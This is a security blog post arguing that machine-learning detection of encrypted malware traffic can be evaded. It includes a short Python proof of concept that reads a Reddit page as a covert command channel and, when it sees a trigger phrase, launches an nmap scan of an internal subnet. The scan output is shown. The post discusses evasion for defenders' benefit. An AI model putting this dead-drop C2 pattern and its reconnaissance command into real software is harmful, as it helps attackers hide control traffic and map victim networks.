Reading /r/netsec today, I happened to come across this recycled old 2017 blog post from Cisco security about detecting malware by applying machine learning to encrypted communications.

Admittedly, it’s an interesting idea. At some point malware started using encrypted communications to get around intrusion detection signatures that detected unencrypted bot traffic. Defenders had to improve their detection.

The question I have though, is: “How realistic is it to detect a determined adversary who wants to evade a machine learning based approach to detecting C2?” From my perspective, pretty hard.

The Cisco blog post shows the success of their techniques on samples of malware from the wild. The story goes like this, researcher compiles lots of data, good and bad, uses Machine Learning techniques to draw something like the above image.

Researcher jumps up and down for joy, “I have 100% accuracy of detecting good traffic and 72.75% accuracy of detecting bad traffic!”

Here’s the problem. Attackers aren’t static. Once you deploy your model, attackers will build new C2 and test against it.

They’ll come up with something like this:


import urllib3
from subprocess import call
urllib3.disable_warnings()

conn = urllib3.connection_from_url('https://www.reddit.com')

r = conn.request('GET', '/r/netsec/')

print("Status: " + r.status)

if(bytes("Detecting Encrypted Malware Traffic (Without Decryption)", encoding='utf-8') in r.data):
   print('Detected C2 Command - Launching portscan')
   call('nmap -sT 10.0.0.0/24 -p 22 > output.txt', shell=True)

The result will be:


python3 browser_comm.py
Status: 200
Detected C2 Command - Launching portscan
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-19 16:10 EDT
Nmap scan report for 10.0.0.10
Host is up (0.0080s latency).

PORT STATE SERVICE
22/tcp closed ssh

Nmap scan report for 10.0.0.15
Host is up (0.014s latency).

PORT STATE SERVICE
22/tcp closed ssh

Nmap scan report for 10.0.0.61
Host is up (0.017s latency).

PORT STATE SERVICE
22/tcp open ssh

Nmap scan report for 10.0.0.71
Host is up (0.011s latency).

PORT STATE SERVICE
22/tcp closed ssh

Nmap done: 256 IP addresses (4 hosts up) scanned in 2.24 seconds

Process finished with exit code 0

Then they’ll sleep for a few days and upload the results.

What am I really showing you here? The code above goes to Reddit, pulls the subreddit, and triggers a command to launch if something is detected in the page. The web is an incredibly dynamic place. There are places to put arbitrary information to trigger C2, places to store payloads, and places to dump results. I’m not arguing that it’s impossible to distinguish good from bad, I’m suggesting bad has numerous places to hide in what looks like good.

At the end of the day, determined attackers will attempt to fit the good model. A few years after they have success, some other researcher will claim to have a new model that detects old attacks. Rinse Repeat.

The image is licensed under the Creative Commons Attribution-Share Alike 4.0 International license. https://creativecommons.org/licenses/by-sa/4.0/deed.en